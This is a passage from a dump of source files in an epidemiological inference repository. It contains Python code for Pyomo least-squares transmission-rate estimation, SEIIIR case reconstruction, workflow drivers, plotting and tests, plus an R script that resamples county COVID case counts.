"or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference.viz.choropleth\n\nfrom .choropleth import create_us_choropleth_scenario, create_us_choropleth_summary\n" }, { "alpha_fraction": 0.6485549211502075, "alphanum_fraction": 0.6485549211502075, "avg_line_length": 32.230770111083984, "blob_id": "4c409a07c0e6bb2002bb4906f1bc55f1cbc292a9", "content_id": "38e4a535f577ac4dcdbed01473af49f9619618a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 865, "license_type": "no_license", "max_line_length": 139, "num_lines": 26, "path": "/epi_inference/engine/meta_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = []\n\nfrom . import driver\nfrom .task import Task\nfrom .task_registry import register_task\n\n\nclass BlockMultiWorkflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"execute_blocks\",\n \"Define a sequence of YAML blocks that are sequentially executed. But parallelization options are applied to each in turn.\")\n\n def validate(self, CONFIG):\n valid_options = set(['blocks', 'num_processes', 'parallel_workflows', 'verbose', 'output', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n driver.run_block_multiworkflow(CONFIG, self._warnings, data)\n\n\nregister_task(BlockMultiWorkflow())\n\n" }, { "alpha_fraction": 0.6303746700286865, "alphanum_fraction": 0.6348280310630798, "avg_line_length": 37.9880256652832, "blob_id": "c10d832b746ebb2140dcfb128859969cdff62a6c", "content_id": "1878a35ac64b98189eafd0dd066150388f07e04a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6512, "license_type": "no_license", "max_line_length": 315, "num_lines": 167, "path": "/epi_inference/formulations/multinode_mobility_window_decay_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run_multinode_mobility_window_decay_lsq']\n\nimport pyutilib.misc.timing as timing\nimport pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\n\nfrom .util import get_windows\n\n\ndef run_multinode_mobility_window_decay_lsq(*, recon, mobility, analysis_window, select_window=None, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n recon : dict()\n A dictionary with reconstruction data, indexed by FIPS codes for US counties.\n mobility : dict()\n A dictionary with inter-county mobility rates.\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n select_window : str\n ISO date format that the window that will be used in this estimation. If None,\n then all windows are used.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # create the Pyomo optimization formulation\n m = create_inference_window_formulation(\n recon=recon,\n mobility=mobility,\n analysis_window=analysis_window,\n select_window=select_window,\n verbose=verbose\n )\n\n if m is None:\n return {'beta': None, 'status': 'failed', 'msg': 'Empty model.'}\n\n # call the solver\n timing.tic('Starting timer for solver')\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m)\n timing.toc('Finished solver')\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n results = {}\n for i in recon:\n county = {}\n county['FIPS'] = i\n county['window_days'] = m.window_days\n county['date'] = [recon[i]['dates'][w] for w in m.WINDOWS]\n if i in m.NODES:\n county['population'] = recon[i]['population']\n county['beta'] = []\n county['status'] = []\n county['infections_in_window'] = []\n for w in m.WINDOWS:\n if m.beta[i,w].stale == True:\n county['beta'].append( None )\n county['status'].append( 'stale' )\n else:\n county['beta'].append( value(m.beta[i,w]) )\n county['status'].append( 'ok' )\n county['infections_in_window'].append( m.window_transmissions[i][w] )\n results[i] = county\n\n return results\n\n\ndef create_inference_window_formulation(*, recon, mobility, analysis_window, select_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n recon : dict()\n A dictionary with reconstruction data, indexed by FIPS codes for US counties.\n mobility : dict()\n A dictionary with inter-county mobility rates.\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n \"\"\"\n window = int(analysis_window.get('days',14))\n assert(window >= 1)\n\n timing.tic('Starting timer for model construction - Pyomo')\n model = pe.ConcreteModel()\n\n eta = 0.5 # fraction of the day spent \"away\"\n\n nodes = set(k for k in recon)\n model.NODES = pe.Set(initialize=nodes)\n\n T_data = dict()\n I1_data = dict()\n I2_data = dict()\n I3_data = dict()\n S_data = dict()\n populations = dict()\n percent_mobile = dict()\n dates = None\n for nodeid in nodes:\n T_data[nodeid] = recon[nodeid]['transmissions']\n I1_data[nodeid] = recon[nodeid]['I1']\n I2_data[nodeid] = recon[nodeid]['I2']\n I3_data[nodeid] = recon[nodeid]['I3']\n S_data[nodeid] = recon[nodeid]['S']\n populations[nodeid] = recon[nodeid]['population']\n percent_mobile[nodeid] = sum(mobility[nodeid][j] for j in mobility[nodeid] if j in nodes)/populations[nodeid] if nodeid in mobility else 0\n\n if dates is None:\n dates = recon[nodeid]['dates']\n timing.toc('setup population and mobility information')\n\n # define the tuples for the windows\n windows = get_windows(dates, window_days=window, select_window=select_window)\n model.TIMES = pe.Set(initialize=windows.TIMES, ordered=True)\n WINDOWS = windows.WINDOWS\n WINDOW_TIMES = windows.WINDOW_TIMES_LIST\n\n # transmission parameter\n model.beta = pe.Var(model.NODES, WINDOWS, initialize=1.0, bounds=(0,None)) \n timing.toc('built variables')\n\n # define the expression for estimated transmissions\n def _infection_process(m, i, w, t):\n\n return m.beta[i,w] * ((I1_data[i][t] + I2_data[i][t] + I3_data[i][t]) /populations[i] * S_data[i][t] * (1-eta*percent_mobile[i])) + sum(m.beta[j,w] * ((I1_data[j][t] + I2_data[j][t] + I3_data[j][t]) * S_data[i][t] * mobility[i][j] * eta / (populations[j]*populations[i])) for j in mobility[i] if j in nodes)\n\n model.T_hat = pe.Expression(model.NODES, WINDOW_TIMES, rule=_infection_process)\n timing.toc('built infection process')\n\n # least squares objective function\n def _lse(m, i):\n return sum( (m.T_hat[i,w,t] - T_data[i][t])**2 for w,t in WINDOW_TIMES)/len(WINDOW_TIMES) #\\\n model.lse = pe.Expression(model.NODES, rule=_lse)\n\n model.total_lse = pe.Objective(expr=sum(model.lse[i] for i in nodes)/len(nodes))\n timing.toc('built objective')\n\n # get the approximate transmissions over the window period\n model.window_transmissions = dict()\n for i in nodes:\n d = dict()\n for w in WINDOWS:\n d[w] = sum(T_data[i][t] for ww,t in WINDOW_TIMES if ww == w)\n model.window_transmissions[i] = d\n \n model.WINDOWS = WINDOWS\n model.window_days = window\n return model\n\n" }, { "alpha_fraction": 0.572022557258606, "alphanum_fraction": 0.5880606174468994, "avg_line_length": 39.56626510620117, "blob_id": "53aa67fb62d889f05f23391c2dcde0426a247f7e", "content_id": "e236d92a21f1032ab46011c6028bcdda8d0156a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 3367, "license_type": "no_license", "max_line_length": 142, "num_lines": 83, "path": "/R_utilities/resample_county_cases.R", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "require(MASS)\nrequire(stringr)\n\nsample_county_negbin <- function(countyfile, window = 3, n_samples = 100, read_dir, write_dir){\n dat <- read.csv(paste0(read_dir, countyfile), stringsAsFactors = F)\n range <- c((window + 1) : nrow(dat)) # Instead using a symmetric window until the end, then using past data\n \n # If the county has no cases, keep them all at zero\n if (dat$Confirmed[nrow(dat)] == 0){\n samples_negbin <- as.data.frame(matrix(data=0, nrow=length(range), ncol=n_samples))\n } else {\n daily <- c(dat$Confirmed[1], dat$Confirmed[2:nrow(dat)] - dat$Confirmed[1:(nrow(dat) - 1)])\n params <- as.data.frame(matrix(data=NA, ncol=3))\n samples_negbin <- as.data.frame(matrix(data=NA, ncol=n_samples))\n r <- 1\n \n for (i in (window + 1):nrow(dat)){\n if (i > (nrow(dat) - window)){\n window_data <- daily[(length(daily) - (2*window + 1)) : length(daily)]\n } else {\n # Using a symmetric window (window size is number of days on either side of date of interest)\n window_data <- daily[(i - window):(i + window)]\n }\n if (all(window_data == 0)){\n # Need to force the negative binomial parameters to get a fit in some cases\n p2 <- 0\n p3 <- 1\n } else {\n if (min(window_data) < 2){\n low <- 0.1\n } else {\n low <- 1\n }\n fit <- TRUE\n fit <- tryCatch(fitdistr(window_data, 'Negative Binomial', lower = low), \n error = function(cond){\n return(fitted = FALSE)\n })\n if (length(fit) == 1){\n p2 <- mean(window_data)\n p3 <- sd(window_data)\n } else {\n p2 <- as.numeric(fitdistr(window_data, 'Negative Binomial', lower = low)$estimate[2])\n p3 <- as.numeric(fitdistr(window_data, 'Negative Binomial', lower = low)$estimate[1])\n }\n }\n params[r,] <- c(as.character(dat$Date[i]), p2, p3)\n samples_negbin[r,] <- rnegbin(n_samples, p2, p3)\n r <- r + 1\n }\n }\n for (j in 1:n_samples){\n new_df <- dat[range,]\n new_df$Confirmed <- cumsum(samples_negbin[,j])\n # Insert one day of zeroes before so that Bill's code works for all counties\n new_df <- rbind(dat[2,], new_df)\n new_df$Confirmed[1] <- 0\n new_df$FIPS <- as.character(new_df$FIPS)\n new_df$FIPS <- str_pad(new_df$FIPS, 5, pad='0')\n \n # Where to write these files\n # write_path <- paste0('../covid-data/formatted_data/county_data_resample/', folder_name, '/sample', str_pad(as.character(j), 3, pad='0'))\n write_path <- paste0(write_dir, '/sample', str_pad(as.character(j), 3, pad='0'))\n if (!dir.exists(file.path(write_path))){\n dir.create(file.path(write_path))\n }\n write.csv(new_df, file=paste0(write_path, '/', countyfile))\n }\n}\n\n# main_dir <- '../covid-data/formatted_data/county_data/'\n# # main_dir <- './formatted_data/county_data/'\n# folder_name <- list.files(main_dir)[length(list.files(main_dir))]\n# path <- paste0(main_dir, folder_name, '/')\n# county_files <- list.files(path)\n# \n# write_path <- paste0('../covid-data/formatted_data/county_data_resample/', folder_name)\n# # write_path <- paste0('./formatted_data/county_data_resample/', folder_name)\n# if (!dir.exists(file.path(write_path))){\n# dir.create(file.path(write_path))\n# }\n# \n# lapply(county_files, sample_county_negbin)\n" }, { "alpha_fraction": 0.748275876045227, "alphanum_fraction": 0.748275876045227, "avg_line_length": 28, "blob_id": "befaba470c8fbc2956034acaeb32c58ca422e3de", "content_id": "5bf08019b593355778772a7f1863da557751d880", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 60, "num_lines": 10, "path": "/epi_inference/engine/config_parameters.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['set_config_parameters', 'get_config_parameters']\n\nglobal_config_parameters = {}\n\ndef set_config_parameters(config_parameters):\n global global_config_parameters\n global_config_parameters = config_parameters\n\ndef get_config_parameters():\n return global_config_parameters\n" }, { "alpha_fraction": 0.7816091775894165, "alphanum_fraction": 0.7816091775894165, "avg_line_length": 20.75, "blob_id": "3b209fc0f3c00aeb86153db28fdfeb446bd4468d", "content_id": "e22103ce0e393fa8666ed2ae688ec8d02936375f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 87, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/epi_inference/viz/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference.viz\n\nfrom . import reconstruction_figs\nfrom . import viz_choropleth_wf\n" }, { "alpha_fraction": 0.5595873594284058, "alphanum_fraction": 0.5610103011131287, "avg_line_length": 34.13750076293945, "blob_id": "854e01f912c8d788f4d94b2ff063e82a7e20a157", "content_id": "654e8ae0f6e31d7d91f2c828c0dbeef786e6b5e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2811, "license_type": "no_license", "max_line_length": 101, "num_lines": 80, "path": "/epi_inference/ATTIC/driver.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import argparse\nimport yaml\nfrom .task_registry import registered_tasks\n\n\ndef driver():\n Parser = argparse.ArgumentParser(description='inference models')\n Parser.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Verbosity flag')\n subparsers = Parser.add_subparsers(title='subcommands', help=\"Help\", dest=\"subparser_name\") \n #\n # Create subparsers\n #\n tasks = registered_tasks()\n parsers = []\n for name in sorted(tasks.keys()):\n parser = subparsers.add_parser(name, help=tasks[name].description)\n parser.add_argument('config_file', help='YAML configuration file')\n parsers.append(parser)\n #\n # Parse sys.argv\n #\n args = Parser.parse_args()\n if args.subparser_name is None:\n Parser.print_help()\n return\n #\n # Load the YAML configuration file\n #\n with open(args.config_file, 'r') as INPUT:\n try:\n config = yaml.safe_load(INPUT)\n except yaml.YAMLError as exc: # pragma: nocover\n print(\"ERROR: problem parsing YAML file\")\n print(exc)\n sys.exit(1)\n if args.verbose:\n print(\"Configuration Arguments\")\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(config)\n print(\"\")\n #\n # Iterate over all config blocks for the specified subcommand\n #\n if not (args.subparser_name in config):\n print(\"WARNING: No configuration blocks specified for '%s' subcommand\" % args.subparser_name)\n\n for cargs in config[args.subparser_name]:\n #\n # If the YAML data contains an 'output*' file, then \n # create a YAML file with metadata\n #\n ofname = None\n ofname = cargs.get('output',ofname)\n ofname = cargs.get('output_csv',ofname)\n ofname = cargs.get('output_json',ofname)\n if ofname is not None:\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cargs:\n metadata['configuration'][key] = cargs[key]\n #\n if ofname.endswith('.csv') or ofname.endswith('.jsn') or ofname.endswith('yml'):\n dfile = cargs['output'][:-4]+\"_meta.yml\"\n elif ofname.endswith('json') or ofname.endswith('yaml'):\n dfile = cargs['output'][:-5]+\"_meta.yml\"\n else:\n raise RuntimeError(\"Unknown output suffix: \"+ofname)\n #\n print(\"Writing file: \"+dfile)\n with open(dfile, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n #\n # Launch the task that is named by\n #\n tasks[args.subparser_name].run(\n {},\n cargs\n )\n" }, { "alpha_fraction": 0.5415162444114685, "alphanum_fraction": 0.5415162444114685, "avg_line_length": 15.235294342041016, "blob_id": "6de45ffb98eed006b4f27b033649831be6875f54", "content_id": "4ef97ba524bae66a181b67102190f3b5cf2b838e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 42, "num_lines": 17, "path": "/epi_inference/engine/task.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['Task']\n\n\nclass Task(object):\n\n def __init__(self, name, description):\n self.name = name\n self.description = description\n\n def validate(self, args):\n pass\n\n def run(self, data, args):\n pass\n\n def warnings(self):\n pass\n\n" }, { "alpha_fraction": 0.5488061308860779, "alphanum_fraction": 0.553507387638092, "avg_line_length": 35.4054069519043, "blob_id": "9ab94a2ab8172b5231af947f8ef43d81a4a8d190", "content_id": "12e936be01a9d2dff1cefa7c0280bbc80d8f8b8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8083, "license_type": "no_license", "max_line_length": 151, "num_lines": 222, "path": "/epi_inference/ATTIC/reconstruct.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import csv\nimport json\nimport sys\n#import argparse\nimport yaml\nimport os.path\n#import shutil\nimport datetime\nimport pprint\nfrom .util import factorial_iterator, ToStr_JSONEncoder\nfrom .formulations import reconstruction as recon\nfrom pyutilib.misc import Options\nimport pandas as pd\n\n\ndef process_config(cfg):\n config = Options()\n\n #config.formulation = cfg['formulation']\n #config.ntrials = cfg.get('ntrials', None)\n config.input_csv = cfg['input_csv']\n config.population = cfg.get('population', None)\n config.county = cfg.get('county', None)\n #config.column = cfg.get('column', None)\n config.reporting_factor = cfg.get('reporting_factor', 1.0)\n config.deltaP = cfg.get('deltaP', 7)\n config.sigma = cfg.get('sigma', None)\n config.gamma = cfg.get('gamma', None)\n #config.factor_levels = cfg.get('factor_levels', None)\n #config.bootstrap = cfg.get('bootstrap', Options())\n #config.analysis_window = cfg.get('analysis_window', Options())\n\n # TODO - deprecate the use of the geodata CSV file option\n # TODO - deprecate the use of the geodata CSV file option\n if 'population_csv' not in cfg:\n config.population_csvfile = cfg.get('geodata_csv', config.input_csv[:-4] + \"_geodata.csv\")\n config.population_csvcolumn = 'pop2010'\n config.population_csvindex = 'geoid'\n else:\n config.population_csvfile = cfg['population_csv']['file']\n config.population_csvcolumn = cfg['population_csv']['population']\n config.population_csvindex = cfg['population_csv']['index']\n\n return config\n\ndef run_reconstruction(df, population_df, CONFIG, verbose):\n population_config = CONFIG.population\n population_csvcolumn = CONFIG.population_csvcolumn\n sigma = CONFIG.sigma\n gamma = CONFIG.gamma\n deltaP = CONFIG.deltaP\n county = CONFIG.county\n reporting_factor = CONFIG.reporting_factor\n\n all_results = list()\n\n for t in df:\n if county is not None and t != county:\n continue\n\n if population_config is None:\n if t not in population_df[population_csvcolumn]: # pragma: no cover\n print(\"WARNING: county \"+str(t)+\" does not have population data available.\")\n continue\n population = population_df[population_csvcolumn][t]\n else:\n population = population_config\n cumulative_reported_cases = df[t].to_list()\n\n if df[t][-1] == 0:\n results = {}\n\n else:\n #\n # DO SIMULATION HERE\n #\n Cdates = pd.date_range(end=datetime.datetime(year=2020, month=4, day=12),\n periods=len(cumulative_reported_cases)).to_pydatetime().tolist()\n\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = recon.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cumulative_reported_cases,\n population=population,\n sigma=sigma,\n gamma=gamma/3,\n reporting_factor=reporting_factor,\n report_delay=deltaP\n )\n\n results = {}\n results['rdates'] = rdates\n results['rcases'] = rcases\n results['dates'] = dates\n results['T'] = T\n results['S'] = S\n results['E'] = E\n results['I1'] = I1\n results['I2'] = I2\n results['I3'] = I3\n results['R'] = R\n results['population'] = population\n\n results['FIPS'] = t\n #\n # Collect results in a list\n #\n all_results.append( results )\n return all_results\n\ndef check_config(config):\n if config.county is not None and type(config.county) is not str: # pragma: no cover\n print(\"ERROR: county id must be specified as a string\")\n sys.exit(1)\n try:\n assert(os.path.exists(config.input_csv))\n except: # pragma: no cover\n print(\"ERROR: input file \"+config.input_csv+\" does not exist\")\n raise\n assert type(config.reporting_factor) is float\n\n\ndef run(args):\n try:\n with open(args.config_file, 'r') as INPUT:\n config = yaml.safe_load(INPUT)\n except yaml.YAMLError as exc: # pragma: nocover\n print(\"ERROR: problem parsing YAML file\")\n print(exc)\n sys.exit(1)\n\n if 'reconstruct' not in config:\n raise ValueError('No \"reconstruct\" key found in the YAML config')\n\n for cfg in config.get('reconstruct', []):\n #\n # Process county case data, and execute reconstructions to predict the \n # temporal evolution of the compartments in the epi model.\n #\n verbose = cfg.get('verbose', args.verbose)\n factors = cfg.get('factors', None)\n output = cfg.get('output_json', None)\n\n assert output is not None\n assert type(verbose) is bool\n\n config = process_config(cfg)\n if verbose:\n print(\"Configuration Arguments\")\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(config)\n print(\"\")\n\n all_results = []\n\n if factors is None:\n config_list = [config]\n else:\n config_list = factorial_iterator(factors, config)\n\n for CONFIG in config_list:\n try:\n population_df = pd.read_csv(CONFIG.population_csvfile, encoding=\"ISO-8859-1\", dtype={CONFIG. population_csvindex:'str'})\n population_df = population_df.set_index(CONFIG.population_csvindex)\n except: # pragma: no cover\n print(\"ERROR reading file \"+CONFIG.population_csvfile)\n raise\n check_config(CONFIG)\n if CONFIG.population is None and CONFIG.county is not None:\n CONFIG.population = population_df[CONFIG.population_csvcolumn][CONFIG.county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(CONFIG.county), str(CONFIG.population)))\n\n #\n # Load the dataframe and experimental metadata (if it's available)\n #\n print(\"Input File: \"+CONFIG.input_csv)\n df = pd.read_csv(CONFIG.input_csv, index_col='Date')\n #\n # Execute inference\n #\n results = run_reconstruction(df, population_df, CONFIG, verbose)\n #\n # Augment reported results\n #\n for trial in results:\n if CONFIG.factor_levels is not None:\n for key, value in CONFIG.factor_levels.items():\n if not key in trial:\n trial[key] = value\n all_results.append( trial )\n\n #\n # Save results\n #\n print(\"Writing results in file \"+output)\n filedir = os.path.dirname(output)\n if not os.path.exists(filedir):\n os.makedirs(filedir)\n with open(output,'w') as OUTPUT:\n json.dump(all_results, OUTPUT, cls=ToStr_JSONEncoder, indent=4)\n #\n # Create a YAML file with metadata\n #\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cfg:\n metadata['configuration'][key] = cfg[key]\n if output.endswith(\".jsn\"):\n metaoutput = output[:-4]+\"_meta.yml\"\n elif output.endswith(\".json\"):\n metaoutput = output[:-5]+\"_meta.yml\"\n else:\n metaoutput = output+\"_meta.yml\"\n print(\"Writing results metadata in file \"+metaoutput)\n with open(metaoutput, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n #\n # Print data\n #\n #for r in all_results:\n # print(r)\n\n" }, { "alpha_fraction": 0.5980559587478638, "alphanum_fraction": 0.6113574504852295, "avg_line_length": 40.260562896728516, "blob_id": "088f3a8433166b984d00d8aa6ffbe366ba9da09e", "content_id": "146e975758d50deb1bda42d4c541c6fd9d9fd4f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5864, "license_type": "no_license", "max_line_length": 152, "num_lines": 142, "path": "/epi_inference/viz/reconstruction_figs.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = [\"compare_florida_reconstruction\"]\n\nimport os\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nfrom ..reconstruction.stochastic import stochastic_reconstruction\nfrom ..simulation.simulation import simulate_discrete_seiiir_stochastic\n\n\ndef compare_florida_reconstruction(seiiir_fname, reported_cases_fname, geodata_fname, output_path):\n \"\"\"\n This function runs reconstructions on data from a stochastic simulation\n and produces some figures showing the results.\n \"\"\"\n\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n # read the true data from the SEIIIR simulation\n seirdf = pd.read_csv(seiiir_fname, parse_dates=['Date'])\n seirdf['dates'] = pd.to_datetime(seirdf['Date'])\n seirdf = seirdf.set_index('dates')\n\n # read the cumulative reported cases\n crcdf = pd.read_csv(reported_cases_fname, parse_dates=['Date'])\n crcdf['dates'] = pd.to_datetime(crcdf['Date'])\n cdcdf = crcdf.set_index('dates')\n\n # read the populations\n popdf = pd.read_csv(geodata_fname)\n popdf = popdf.set_index('geoid')\n populations = popdf['pop2010'].to_dict()\n populations = {str(int(k)):v for k,v in populations.items()}\n \n # get the list of counties\n counties = set(seirdf.columns.to_list())\n counties.remove('Date')\n counties.remove('comp')\n counties = sorted(counties)\n\n # loop through all the counties and perform the reconstruction\n # based on the reported cases\n pdf = PdfPages(os.path.join(output_path, 'reconstruction-comparison-florida.pdf'))\n for c in counties:\n print('...', c)\n Cdates = crcdf['dates'].tolist()\n Ccases = crcdf[c].astype(int).tolist()\n dfsim_S = seirdf[seirdf['comp'] == 'S'][c]\n dfsim_E = seirdf[seirdf['comp'] == 'E'][c]\n dfsim_I1 = seirdf[seirdf['comp'] == 'I1'][c]\n dfsim_I2 = seirdf[seirdf['comp'] == 'I2'][c]\n dfsim_I3 = seirdf[seirdf['comp'] == 'I3'][c]\n dfsim_R = seirdf[seirdf['comp'] == 'R'][c]\n\n dfrecon_S = None\n dfrecon_T = None\n dfrecon_E = None\n dfrecon_I1 = None\n dfrecon_I2 = None\n dfrecon_I3 = None\n dfrecon_R = None\n\n for real in range(100):\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = stochastic_reconstruction_w_stepsize(Cdates, Ccases, populations[c], 4, fixed_delay=True)\n\n if dfrecon_S is None:\n dfrecon_S = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_T = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_E = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_I1 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_I2 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_I3 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_R = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n\n dfrecon_S['{}'.format(real)] = S\n dfrecon_T['{}'.format(real)] = T\n dfrecon_E['{}'.format(real)] = E\n dfrecon_I1['{}'.format(real)] = I1\n dfrecon_I2['{}'.format(real)] = I2\n dfrecon_I3['{}'.format(real)] = I3\n dfrecon_R['{}'.format(real)] = R\n\n ax = dfrecon_S.plot(color='silver', legend=False)\n dfsim_S[dfsim_S.index.isin(dfrecon_S.index)].plot(ax=ax, color='black', legend='Simulated S')\n plt.title('S comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfrecon_E.plot(color='silver', legend=False)\n dfsim_E[dfsim_E.index.isin(dfrecon_E.index)].plot(ax=ax, color='black', legend='Simulated E')\n plt.title('E comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfrecon_I1.plot(color='silver', legend=False)\n dfsim_I1[dfsim_I1.index.isin(dfrecon_I1.index)].plot(ax=ax, color='black', legend='Simulated I1')\n plt.title('I1 comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfrecon_I2.plot(color='silver', legend=False)\n dfsim_I2[dfsim_I2.index.isin(dfrecon_I2.index)].plot(ax=ax, color='black', legend='Simulated I2')\n plt.title('I2 comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfrecon_I3.plot(color='silver', legend=False)\n dfsim_I3[dfsim_I3.index.isin(dfrecon_I3.index)].plot(ax=ax, color='black', legend='Simulated I3')\n plt.title('I3 comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfrecon_R.plot(color='silver', legend=False)\n dfsim_R[dfsim_R.index.isin(dfrecon_R.index)].plot(ax=ax, color='black', legend='Simulated R')\n lower_percentile = dfrecon_R.quantile(0.025, axis=1)[dfrecon_R.index[-1]]\n upper_percentile = dfrecon_R.quantile(0.975, axis=1)[dfrecon_R.index[-1]]\n sim_value = dfsim_R[dfrecon_R.index[-1]]\n msg = ''\n if sim_value < lower_percentile or sim_value > upper_percentile:\n msg = '*'\n print('Simulated R outside of 95th percentiles for count {}: ({} ({}) {}) {}'.format(c, lower_percentile, sim_value, upper_percentile, msg))\n\n plt.title('R comparison ({} ({}) {}) {}'.format(lower_percentile, sim_value, upper_percentile, msg))\n pdf.savefig()\n plt.close()\n\n pdf.close()\n\n\n\nif __name__ == '__main__':\n np.random.seed(1975)\n seiiir_fname = './data/FL_SEIIIR_R0_2.25_realization_42.csv'\n reported_cases_fname = './data/FL_reported_cases_R0_2.25_realization_42.csv'\n geodata_fname = './data/geodata.csv'\n output_path = './figures/'\n \n compare_florida_reconstruction(seiiir_fname, reported_cases_fname, geodata_fname, output_path)\n \n" }, { "alpha_fraction": 0.6252723336219788, "alphanum_fraction": 0.6686472296714783, "avg_line_length": 48.009708404541016, "blob_id": "1dadaafcbd4d3df8a3f14e517cf0b28477b6adc3", "content_id": "5d980eb199ab1dce4cf33c7e5477aa5007a25374", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5049, "license_type": "no_license", "max_line_length": 162, "num_lines": 103, "path": "/epi_inference/reconstruction/tests/test_recon_workflows.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport pandas as pd\nimport shutil\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\n\nfrom epi_inference.engine import driver\nfrom epi_inference.util import compare_csv, compare_json\n\nkeepfiles = False\n\nclass TestReconstruct():\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n def test_reconstruct_deterministic(self):\n args = Options()\n args.block = 'deterministic'\n args.config_file = './config_files/reconstruct_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the json files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_json('./output/recon_countydata1_all.json', './baseline/recon_countydata1_all.json')\n outputdf, golddf = compare_json('./output/recon_countydata1_12011.json', './baseline/recon_countydata1_12011.json')\n \n # cleanup the files we created\n if not keepfiles:\n os.remove('./output/recon_countydata1_all.json')\n os.remove('./output/recon_countydata1_all_meta.yml')\n os.remove('./output/recon_countydata1_12011.json')\n os.remove('./output/recon_countydata1_12011_meta.yml')\n\n def test_reconstruct_stochastic(self):\n args = Options()\n args.block = 'stochastic'\n args.config_file = './config_files/reconstruct_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the json files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_json('./output/recon_stoch_countydata1_all_38479387.json', './baseline/recon_stoch_countydata1_all_38479387.json')\n outputdf, golddf = compare_json('./output/recon_stoch_countydata1_all_39847938.json', 